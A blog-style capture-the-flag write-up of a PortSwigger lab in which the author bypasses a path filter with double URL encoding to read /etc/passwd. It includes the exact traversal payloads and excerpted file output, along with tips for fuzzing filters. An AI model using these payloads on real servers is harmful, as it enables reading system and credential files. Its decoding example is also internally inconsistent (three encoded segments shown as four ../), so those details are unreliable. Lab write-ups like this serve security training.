Breaking Paths & Bypassing Filters: A Journey Through Path Traversal

Ayush SharmaAyush Sharma
2 min read

Introduction

Today, I'm sharing my hands-on adventure through a real-world lab from PortSwigger's Web Security Academy, where I successfully exploited a Path Traversal vulnerability to read the sensitive /etc/passwd file. If you've ever wondered how to sneak past file path filters or what double URL encoding can do for your hacking game, this one's for you.


The Lab Scenario

Lab Name: File path traversal, validation of start of path

In this challenge, the application allowed users to retrieve images from a server via a URL like this: GET /image?filename=smile.jpg

Our goal? Trick the server into reading files outside of the image directory — particularly, the classic Linux file: /etc/passwd.


Understanding Path Traversal

Path traversal (or directory traversal) is a vulnerability that lets an attacker access files and directories that are stored outside the intended folder. This is often achieved using sequences like: ../ (dot dot slash)

These sequences climb up the directory structure — like walking out of a room, going back into the hallway, and sneaking into a locked file room. 🕵️


The Obstacle Course: Filters and Sanitization

Web applications often sanitize user input to prevent attacks. In our case, basic ../ payloads didn’t work:
GET /image?filename=../../../etc/passwd

This resulted in a 400 Bad Request or a response like: "No such file"
That's when I remembered a classic evasion technique: double URL encoding.


The Payload That Broke Through

After trying multiple bypass techniques, I used this payload:
GET /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

Decoded once, it becomes: %2e%2e/%2e%2e/%2e%2e/etc/passwd
Decoded again, it turns into: ../../../../etc/passwd
Boom! The server processed the path and responded with a beautiful dump of the /etc/passwd file:

root:x:0:0:root:/root:/bin/bash
...
peter:x:12001:12001::/home/peter:/bin/bash
academy:x:10000:10000::/academy:/bin/bash

Success!


What I Learned

  1. Encoding is your friend: Filters that block ../ might not block %2e%2e%2f, and definitely might not block double-encoded versions.

  2. Think in layers: If one decoding cycle blocks you, try sneaking in with two.

  3. Automation helps: Burp Intruder is your ally. You can fuzz payloads to see which ones break through.


Tips for Your Own Journey

  • Build a personal payload vault with different encoding formats.

  • Practice decoding manually so you understand the logic.

  • Don’t memorize payloads — memorize strategies.

  • Always test different encoding depths: normal, URL-encoded, double-encoded.


Final Words

This challenge was more than a lab. It was a dance with filters, a battle with encoding, and a moment of triumph when the terminal whispered secrets from /etc/passwd. 🎉

Hack smart. Hack ethically. And always outthink the filter.


~ Xoryush

1
Subscribe to my newsletter

Read articles from Ayush Sharma directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Ayush Sharma
Ayush Sharma